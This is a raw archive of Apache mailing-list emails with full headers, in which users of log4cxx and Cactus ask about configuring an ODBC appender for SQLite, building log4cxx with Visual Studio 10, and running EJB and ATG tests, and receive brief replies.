(161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Jan 2011 19:58:04 +0000 X-ASF-Spam-Status: No, hits=1.5 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_LOW,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ww0-f41.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Jan 2011 19:57:57 +0000 Received: by wwi18 with SMTP id 18so1090215wwi.4 for <[email protected]>; Fri, 21 Jan 2011 11:57:36 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:in-reply-to:references:date :message-id:subject:from:to:content-type; bh=YtSG+072lL2eBVIrwHd9cPB3MgwIuPotRhmIpowsrMw=; b=eL0hiXOu7sFBLu0T7LTg3gkB6Vr/qh34MmeCVWAsLmBqiOaPGSNVfL2/vQyXkdWhow /2zS2TmPP9azesVhQ/sRI2QOFqZxLuITuggHGl3LxVjtrHyVpfnw9DNPFmgKZt9ho51b g9/Htyz9PTCXfS4/HU8Ugl+gXpWi3/siEtGtA= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=EXMn4H6r6AJeo/p3aJ3M8XKFnDG4eQva85no4rKutzpPSqacSGV/ezcWwn4uVu8gbt 06bdwi4J1d/XbnOuXTHAb5gDuXMK3AHIYWgQ78rmYS22CMSVCe/kU3qcYCsYK9YU7KHg ZodUPO8ANTvaV6n8KS98cVHNIpK6BSQ9nhDm4= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id z15mr1015864weo.61.1295639856457; Fri, 21 Jan 2011 11:57:36 -0800 (PST) Received: by 161.129.204.104 with HTTP; Fri, 21 Jan 2011 11:57:36 -0800 (PST) In-Reply-To: <[email protected]> References: <[email protected]> Date: Fri, 21 Jan 2011 13:57:36 -0600 Message-ID: <[email protected]> Subject: ODBCAppender with sqlite3 From: Tavis Bones <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0016e6dab18a66a6fc049a60a98d --0016e6dab18a66a6fc049a60a98d Content-Type: text/plain; charset=ISO-8859-1 I'm trying to figure out how to use the ODBCAppender using sqlite3. What would the xml look like? What would be in the param of URL? Is that even needed? For example: <appender name="testSqliteAppender" class="org.apache.log4j.odbc.ODBCAppender"> <param name="URL" value="Driver={sqlite3};Server=localhost ;Port=5432;Database=errorlog;Uid=sqlite3;Pwd=abc123;"/> <layout class="org.apache.log4j.PatternLayout"> <param name="ConversionPattern" value="INSERT INTO errorlog (errormessage) VALUES ('%d - %c - %p -%m')"/> </layout> </appender> --0016e6dab18a66a6fc049a60a98d Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable <div class=3D"gmail_quote">I&#39;m trying to figure out how to use the ODBC= Appender using sqlite3. =A0What would the xml look like? =A0What would be i= n the param of URL? Is that even needed?<div><br></div><div>For example:</d= iv> <div><br></div><div> <p>=A0&lt;appender name=3D&quot;testSqliteAppender&quot; class=3D&quot;org.= apache.log4j.odbc.ODBCAppender&quot;&gt;</p> <p>=A0&lt;param name=3D&quot;URL&quot; value=3D&quot;Driver=3D{sqlite3};Ser= ver=3D<span>localhost</span>;Port=3D5432;Database=3D<span>errorlog</span>;<= span>Uid</span>=3D<span>sqlite3</span>;<span>Pwd</span>=3Dabc123;&quot;/&gt= ;</p> <p>=A0<span> </span>&lt;layout class=3D&quot;org.apache.log4j.PatternLayout= &quot;&gt;</p> <p>=A0<span> </span>&lt;param name=3D&quot;ConversionPattern&quot; value=3D= &quot;INSERT INTO <span>errorlog</span> (<span>errormessage</span>) VALUES = (&#39;%d - %c - %p -%m&#39;)&quot;/&gt;</p> <p>=A0<span> </span>&lt;/layout&gt;</p> <p>=A0 &lt;/appender&gt;=A0</p></div> </div><br> --0016e6dab18a66a6fc049a60a98d-- From [email protected] Mon Jan 24 01:00:08 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86515 invoked from network); 24 Jan 2011 01:00:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Jan 2011 01:00:08 -0000 Received: (qmail 62988 invoked by uid 500); 24 Jan 2011 01:00:08 -0000 Delivered-To: [email protected] Received: (qmail 62906 invoked by uid 500); 24 Jan 2011 01:00:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 62898 invoked by uid 99); 24 Jan 2011 01:00:06 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 24 Jan 2011 01:00:06 +0000 X-ASF-Spam-Status: No, hits=-0.7 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_LOW,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-yi0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 24 Jan 2011 00:59:59 +0000 Received: by yie16 with SMTP id 16so1158472yie.34 for <[email protected]>; Sun, 23 Jan 2011 16:59:38 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:sender:content-type:mime-version:subject:from :in-reply-to:date:content-transfer-encoding:message-id:references:to :x-mailer; bh=OCsHnwsAjRYiPFedn628JeJZTaqvnORVEGNGyLYc3OY=; b=q/eFCpKzWkFXSJx4cF0J7vEp+ZfCfXWFLZPDGhL2493GKkD9EpC2K59id8vimtTqWW logb+Fl1+E8rwDMKJx4uPkMO3bacqXDJXHobd32BXsLp8E29IOf6eTcYn3Tx4sgtUaKi WzTeSAYys1YZRngGGsuMIgBoM/GTsNDU1zWc8= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=sender:content-type:mime-version:subject:from:in-reply-to:date :content-transfer-encoding:message-id:references:to:x-mailer; b=YzsuQqpUm3CozVN25e2TqAgtkZUWWIWp5PjQ1ZthkoG0UrI/BGKIA/w1vAaoUJcHw5 qT+Z3A2BjegXyfjpjN2Is0e6eGhZ6pRL1tW/4+2zcd5Un1opepzOYABMHW+oOMFgQKaJ KqCQpt7+jyfMst3/CFZCT1C+PM6OkcxwoyZrY= Received: by 161.129.204.104 with SMTP id l20mr4200166agb.57.1295830778479; Sun, 23 Jan 2011 16:59:38 -0800 (PST) Received: from [161.129.204.104] (70-139-215-122.lightspeed.cyprtx.sbcglobal.net [161.129.204.104]) by mx.google.com with ESMTPS id b19sm15383295ana.7.2161.129.204.104.59.35 (version=TLSv1/SSLv3 cipher=RC4-MD5); Sun, 23 Jan 2011 16:59:36 -0800 (PST) Sender: Curt Arnold <[email protected]> Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Apple Message framework v1082) Subject: Re: ODBCAppender with sqlite3 From: Curt Arnold <[email protected]> In-Reply-To: <[email protected]> Date: Sun, 23 Jan 2011 18:59:34 -0600 Content-Transfer-Encoding: quoted-printable Message-Id: <[email protected]> References: <[email protected]> <[email protected]> To: "Log4CXX User" <[email protected]> X-Mailer: Apple Mail (2.1082) I don't have any personal experience with the ODBCAppender at all and = can't recall ODBC+SQLite coming up before but I didn't check the archive = myself. =20 Doing a quick search, it appears that ODBC support can be provided by = several third party software. Likely the configuration strings would = vary depending on which ODBC for SQLite implementation you used. Since, = as far as I can tell, they aren't socket-based, specifying ports seems = at best meaningless. Seems like a better path forward would be to write a custom appender for = SQLite bypassing a third-party ODBC driver. LOGCXX-101 was someone's = effort to do that for MySQL. If there were to be an appender add to = log4cxx proper, I would suggest using APR's database abstraction layer = as suggested in LOGCXX-61. https://issues.apache.org/jira/browse/LOGCXX-61 https://issues.apache.org/jira/browse/LOGCXX-101 On Jan 21, 2011, at 1:57 PM, Tavis Bones wrote: > I'm trying to figure out how to use the ODBCAppender using sqlite3. = What would the xml look like? What would be in the param of URL? Is = that even needed? >=20 > For example: >=20 > <appender name=3D"testSqliteAppender" = class=3D"org.apache.log4j.odbc.ODBCAppender"> >=20 > <param name=3D"URL" = value=3D"Driver=3D{sqlite3};Server=3Dlocalhost;Port=3D5432;Database=3Derro= rlog;Uid=3Dsqlite3;Pwd=3Dabc123;"/> >=20 > <layout class=3D"org.apache.log4j.PatternLayout"> >=20 > <param name=3D"ConversionPattern" value=3D"INSERT INTO errorlog = (errormessage) VALUES ('%d - %c - %p -%m')"/> >=20 > </layout> >=20 > </appender>=20 >=20 >=20 From [email protected] Mon Jan 24 04:33:50 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9249 invoked from network); 24 Jan 2011 04:33:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Jan 2011 04:33:50 -0000 Received: (qmail 20627 invoked by uid 500); 24 Jan 2011 04:33:50 -0000 Delivered-To: [email protected] Received: (qmail 20331 invoked by uid 500); 24 Jan 2011 04:33:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 20318 invoked by uid 99); 24 Jan 2011 04:33:46 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 24 Jan 2011 04:33:46 +0000 X-ASF-Spam-Status: No, hits=-2.3 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO e28smtp03.in.ibm.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 24 Jan 2011 04:33:36 +0000 Received: from d28relay01.in.ibm.com (d28relay01.in.ibm.com [161.129.204.104]) by e28smtp03.in.ibm.com (8.14.4/8.13.1) with ESMTP id p0O4XA3Q004293 for <[email protected]>; Mon, 24 Jan 2011 10:03:10 +0530 Received: from d28av04.in.ibm.com (d28av04.in.ibm.com [161.129.204.104]) by d28relay01.in.ibm.com (8.13.8/8.13.8/NCO v10.0) with ESMTP id p0O4XA0Q3842274 for <[email protected]>; Mon, 24 Jan 2011 10:03:10 +0530 Received: from d28av04.in.ibm.com (loopback [161.129.204.104]) by d28av04.in.ibm.com (8.14.4/8.13.1/NCO v10.0 AVout) with ESMTP id p0O4XAQI003188 for <[email protected]>; Mon, 24 Jan 2011 15:33:10 +1100 Received: from d23ml175.in.ibm.com (d23ml175.in.ibm.com [161.129.204.104]) by d28av04.in.ibm.com (8.14.4/8.13.1/NCO v10.0 AVin) with ESMTP id p0O4X9aA003167 for <[email protected]>; Mon, 24 Jan 2011 15:33:09 +1100 Subject: AUTO: Chhavi Agarwal is out of the office (returning 01/25/2011) Auto-Submitted: auto-generated From: Chhavi Agarwal <[email protected]> To: "Log4CXX User" <[email protected]> Message-ID: <[email protected]> Date: Mon, 24 Jan 2011 10:02:04 +0530 X-MIMETrack: Serialize by Router on d23ml175/23/M/IBM(Release 8.5.1FP4|July 25, 2010) at 01/24/2011 10:02:04 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII X-Virus-Checked: Checked by ClamAV on apache.org I am out of the office until 01/25/2011. On Vacation. Please contact swapni ( Swapnil D Joshi )l for any project related queries. Note: This is an automated response to your message "Re: ODBCAppender with sqlite3" sent on 1/24/11 6:29:34. This is the only notification you will receive while this person is away. From [email protected] Mon Jan 24 10:31:07 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 69366 invoked from network); 24 Jan 2011 10:31:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Jan 2011 10:31:07 -0000 Received: (qmail 68351 invoked by uid 500); 24 Jan 2011 10:31:07 -0000 Delivered-To: [email protected] Received: (qmail 68151 invoked by uid 500); 24 Jan 2011 10:31:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 68141 invoked by uid 99); 24 Jan 2011 10:31:03 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 24 Jan 2011 10:31:03 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail.prostep.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 24 Jan 2011 10:30:57 +0000 Importance: normal Priority: normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4657 Content-Class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Subject: log4cxx and Visual Studio 10 Date: Mon, 24 Jan 2011 11:30:34 +0100 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: log4cxx and Visual Studio 10 thread-index: Acu7sbwQdGVV55QAQYCi613apgmMMw== From: "Zerbst, Carsten" <[email protected]> To: <[email protected]> Hello,=20 I read several instructions how to compile log4cxx with VS10 but still.=20 Has someone else succeeded and could provide a working instruction or a = working project ? Thanks, Carsten=20 ________________________________________________ PROSTEP ITS GmbH, Dolivostr.11, D-64293 Darmstadt HR: Amtsgericht Darmstadt, HRB 8805 Gesch=E4ftsf=FChrung: Dr. Markus Sachers, Reinhard Betz=20 ________________________________________________ From [email protected] Mon Jan 24 12:37:38 2011 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30109 invoked from network); 24 Jan 2011 12:37:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Jan 2011 12:37:38 -0000 Received: (qmail 19731 invoked by uid 500); 24 Jan 2011 12:37:38 -0000 Delivered-To: [email protected] Received: (qmail 19437 invoked by uid 500); 24 Jan 2011 12:37:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 19417 invoked by uid 99); 24 Jan 2011 12:37:34 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 24 Jan 2011 12:37:34 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO fortress.beyondsecurity.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 24 Jan 2011 12:37:26 +0000 Received: (qmail 32174 invoked from network); 24 Jan 2011 05:10:34 -0800 Received: from unknown (HELO fezzik.beyondsecurity.com) (161.129.204.104) by www.beyondsecurity.com with SMTP; 24 Jan 2011 05:10:34 -0800 Received: from [161.129.204.104] (unknown [161.129.204.104]) by fezzik.beyondsecurity.com (Postfix) with ESMTP id 56444208052 for <[email protected]>; Mon, 24 Jan 2011 14:36:33 +0200 (IST) Message-ID: <[email protected]> Date: Mon, 24 Jan 2011 14:37:03 +0200 From: Noam Rathaus <[email protected]> User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:161.129.204.104) Gecko/20101208 Thunderbird/3.1.7 MIME-Version: 1.0 To: [email protected] Subject: Re: log4cxx and Visual Studio 10 References: <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 1.1.2 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org Hi Carsten, I am able to run, compile and use log4cxx under VS10, the main problem I had was code modifications that were required not any other "project settings". I had these issues (explained there): http://old.nabble.com/Unable-to-build-with-VS2010-td28519743.html And solved it using the explanation found there On 24/01/11 12:30, Zerbst, Carsten wrote: > Hello, > > I read several instructions how to compile log4cxx with VS10 but still. > Has someone else succeeded and could provide a working instruction or a working project ? > > Thanks, Carsten > ________________________________________________ > PROSTEP ITS GmbH, Dolivostr.11, D-64293 Darmstadt > HR: Amtsgericht Darmstadt, HRB 8805 > Geschäftsführung: Dr. Markus Sachers, Reinhard Betz > ________________________________________________ > >
From [email protected] Tue Apr 13 21:11:13 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81943 invoked from network); 13 Apr 2010 21:11:13 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 13 Apr 2010 21:11:13 -0000 Received: (qmail 14389 invoked by uid 500); 13 Apr 2010 21:11:13 -0000 Delivered-To: [email protected] Received: (qmail 14348 invoked by uid 500); 13 Apr 2010 21:11:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "Cactus Users List" <cactus-user.jakarta.apache.org> Reply-To: "Cactus Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 14340 invoked by uid 99); 13 Apr 2010 21:11:12 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Apr 2010 21:11:12 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-vw0-f44.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Apr 2010 21:11:05 +0000 Received: by vws11 with SMTP id 11so1076444vws.31 for <[email protected]>; Tue, 13 Apr 2010 14:10:44 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:received:message-id :subject:from:to:content-type; bh=ouRcSAxfAhqQuBd8xTXu1XpHxvRenxj3D4NQR2nDaoE=; b=x7lzkaFTWOqJJzBV455PvDRJGUlmIjtpJlunKsNRrndP5Yf/N7NqeN77G9lPwsYH/N 2lnS41R1xk3ZEOA7mPAgCUEXQJXax/2tChLRrwWw/yTSSZiXLiuUZTiMI7I68Qagjumb Ax+R28q/s/BhmMFW8D6y5limjmB7l4RQbIGmI= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=l0fg9r4S0UQwdn0XFKOrXYLUH/GRhvrRiIJyEY5C8NOfDTOC7oxqfyiJRlHsIs688u 8mZsNWy2wHlHrHSxx6QIns3NB6YDyFPBwj3gcQpxpdyCE7pNI3e+1mCNC7NQf7axPNQo W9iV0j1c4/UG3dCiICI1DzxnVx6R4DxEalbtY= MIME-Version: 1.0 Received: by 161.129.204.104 with HTTP; Tue, 13 Apr 2010 14:10:44 -0700 (PDT) Date: Tue, 13 Apr 2010 17:10:44 -0400 Received: by 161.129.204.104 with SMTP id z22mr3443608vco.63.1271193044649; Tue, 13 Apr 2010 14:10:44 -0700 (PDT) Message-ID: <[email protected]> Subject: cannot run ejb tests with maven2 From: Navjeet <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=00c09f905b17de0bde048424b1fa X-Virus-Checked: Checked by ClamAV on apache.org --00c09f905b17de0bde048424b1fa Content-Type: text/plain; charset=ISO-8859-1 I am trying to run a test for ejb classs with cactus on OC4j but no luck so far. My maven project structure is like following replication (top level module) |----ear (depends on ejb and war module) |----ejb (This has ejb's and ejb test classes) |----war Here is maven2 cactus plugin xml which is embedded in pom.xml under replication module. <plugin> <groupId>org.apache.cactus</groupId> <artifactId>cactus.integration.maven2</artifactId> <version>1.8.1</version> <configuration> <srcFile>target/replication-1.0.ear</srcFile> <cactusWar> <context>/</context> <redirectors> <servletRedirector> <name>ServletRedirectorSecure</name> <mapping>/ServletRedirectorSecure</mapping> <roles>test</roles> </servletRedirector> <servletRedirector/> <filterRedirector> <name>FilterRedirector</name> <mapping>/test/filterRedirector</mapping> </filterRedirector> </redirectors> <libDependencies> <dependency> <groupId>javax.servlet</groupId> <artifactId>servlet-api</artifactId> </dependency> <dependency> <groupId>httpunit</groupId> <artifactId>httpunit</artifactId> </dependency> </libDependencies> <testClasses> <directory>replication/ejb/target/classes</directory> <includes> <include>**/*Test*.*</include> </includes> </testClasses> <version>2.3</version> </cactusWar> </configuration> <executions> <execution> <id>cactus-cactifyear</id> <phase>pre-integration-test</phase> <goals> <goal>cactifyear</goal> </goals> </execution> </executions> </plugin> When I run "mvn integration-test", it makes a cactified war, which I am manually deploying to OC4J. But it does seem to run the tests. I am new to maven so I could be doing something wrong there, What am I doing wrong here? Navjeet Blog: http://chabbewal.blogspot.com Twitter: http://twitter.com/navjeetc --00c09f905b17de0bde048424b1fa-- From [email protected] Mon Apr 19 15:07:26 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 46721 invoked from network); 19 Apr 2010 15:07:25 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 19 Apr 2010 15:07:25 -0000 Received: (qmail 2523 invoked by uid 500); 19 Apr 2010 15:07:25 -0000 Delivered-To: [email protected] Received: (qmail 2440 invoked by uid 500); 19 Apr 2010 15:07:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "Cactus Users List" <cactus-user.jakarta.apache.org> Reply-To: "Cactus Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 2427 invoked by uid 99); 19 Apr 2010 15:07:24 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Apr 2010 15:07:24 +0000 X-ASF-Spam-Status: No, hits=2.9 required=10.0 tests=HTML_MESSAGE,RCVD_IN_DNSWL_NONE,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO mail1.sea5.speakeasy.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Apr 2010 15:07:17 +0000 Received: (qmail 29592 invoked from network); 19 Apr 2010 15:06:55 -0000 Received: from unknown (HELO [161.129.204.104]) (lorenzopt@[161.129.204.104]) (envelope-sender <[email protected]>) by mail1.sea5.speakeasy.net (qmail-ldap-1.03) with AES128-SHA encrypted SMTP for <[email protected]>; 19 Apr 2010 15:06:55 -0000 From: Lorenzo Thurman <[email protected]> Content-Type: multipart/alternative; boundary=Apple-Mail-463--822845747 Subject: Help running ATG unit tests Date: Mon, 19 Apr 2010 10:06:53 -0500 Message-Id: <[email protected]> To: [email protected] Mime-Version: 1.0 (Apple Message framework v1078) X-Mailer: Apple Mail (2.1078) X-Virus-Checked: Checked by ClamAV on apache.org --Apple-Mail-463--822845747 Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset=us-ascii Does anyone have any experience using Cactus to run unit tests for ATG? = I found this page: http://www.onwhichsubject.com/DynaCactus/ But it leaves much out. At least for me, a complete novice to both = platforms. I got Cactus installed and setup according to the instructions. I = created the sample test shown on the page and tried to run it as a junit = test, but I get this error: org.apache.cactus.util.ChainedRuntimeException: Missing Cactus = property[cactus.contextURL] The page suggests that you setup a special ATG module that will run my = tests, which I did. I've created a cactus.properties file and place it in the WEB-INF folder = of the test Dynamo project module setup to run my tests. Can someone help me out here? Thanks "A good friend will help you move. A really good friend will help you = move a body" --Unknown Lorenzo Thurman [email protected] --Apple-Mail-463--822845747-- From [email protected] Mon Apr 19 16:13:40 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91683 invoked from network); 19 Apr 2010 16:13:40 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 19 Apr 2010 16:13:40 -0000 Received: (qmail 28605 invoked by uid 500); 19 Apr 2010 16:13:40 -0000 Delivered-To: [email protected] Received: (qmail 28580 invoked by uid 500); 19 Apr 2010 16:13:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "Cactus Users List" <cactus-user.jakarta.apache.org> Reply-To: "Cactus Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 28572 invoked by uid 99); 19 Apr 2010 16:13:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Apr 2010 16:13:39 +0000 X-ASF-Spam-Status: No, hits=2.9 required=10.0 tests=HTML_MESSAGE,RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,WEIRD_PORT X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO mail2.sea5.speakeasy.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Apr 2010 16:13:32 +0000 Received: (qmail 25859 invoked from network); 19 Apr 2010 16:13:09 -0000 Received: from unknown (HELO [161.129.204.104]) (lorenzopt@[161.129.204.104]) (envelope-sender <[email protected]>) by mail2.sea5.speakeasy.net (qmail-ldap-1.03) with AES128-SHA encrypted SMTP for <[email protected]>; 19 Apr 2010 16:13:09 -0000 Subject: Re: Help running ATG unit tests Mime-Version: 1.0 (Apple Message framework v1078) Content-Type: multipart/alternative; boundary=Apple-Mail-464--818872656 From: Lorenzo Thurman <[email protected]> In-Reply-To: <[email protected]> Date: Mon, 19 Apr 2010 11:13:06 -0500 Cc: Ashish Aggarwal <[email protected]> Message-Id: <[email protected]> References: <[email protected]> <[email protected]> To: [email protected] X-Mailer: Apple Mail (2.1078) X-Virus-Checked: Checked by ClamAV on apache.org --Apple-Mail-464--818872656 Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset=us-ascii Thank you, now I'm at the next error: ClassNotFoundException for my tests. The class file in not being built. Any ideas? On Apr 19, 2010, at 11:00 AM, Ashish Aggarwal wrote: > Hi Lorenzo: >=20 > The error which you are getting = "org.apache.cactus.util.ChainedRuntimeException: Missing Cactus = property[cactus.contextURL]" is because of the missing cactus.contextURL = property value. Though I dont know much about ATG but here is how you = can setup this property in your cactified web application: >=20 > Considering that you have a test class ApplicationDaoTest (basically a = Junit class) which extends ServletTestCase, you can create a method in = this class: >=20 > public void begin(WebRequest request){ > = request.addParameter("cactus.contextURL","http://localhost:9080/CisAccount= EjbCactusTestSuite"); > } =20 >=20 > You will need to change the URL value to the appropriate value of your = application.=20 >=20 > This should get you going. >=20 > Regards > Ashish >=20 > On Mon, Apr 19, 2010 at 8:06 AM, Lorenzo Thurman = <[email protected]> wrote: > Does anyone have any experience using Cactus to run unit tests for = ATG? I found this page: > http://www.onwhichsubject.com/DynaCactus/ >=20 > But it leaves much out. At least for me, a complete novice to both = platforms. > I got Cactus installed and setup according to the instructions. I = created the sample test shown on the page and tried to run it as a junit = test, but I get this error: > org.apache.cactus.util.ChainedRuntimeException: Missing Cactus = property[cactus.contextURL] >=20 > The page suggests that you setup a special ATG module that will run my = tests, which I did. > I've created a cactus.properties file and place it in the WEB-INF = folder of the test Dynamo project module setup to run my tests. > Can someone help me out here? > Thanks >=20 > "A good friend will help you move. A really good friend will help you = move a body" > --Unknown >=20 > Lorenzo Thurman > [email protected] >=20 >=20 >=20 "Be careless in your dress if you will, but keep a tidy soul." -- Sam Clemens Lorenzo Thurman [email protected] --Apple-Mail-464--818872656-- From [email protected] Mon Apr 19 16:13:56 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91864 invoked from network); 19 Apr 2010 16:13:56 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 19 Apr 2010 16:13:56 -0000 Received: (qmail 29215 invoked by uid 500); 19 Apr 2010 16:13:56 -0000 Delivered-To: [email protected] Received: (qmail 29169 invoked by uid 500); 19 Apr 2010 16:13:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "Cactus Users List" <cactus-user.jakarta.apache.org> Reply-To: "Cactus Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 29160 invoked by uid 99); 19 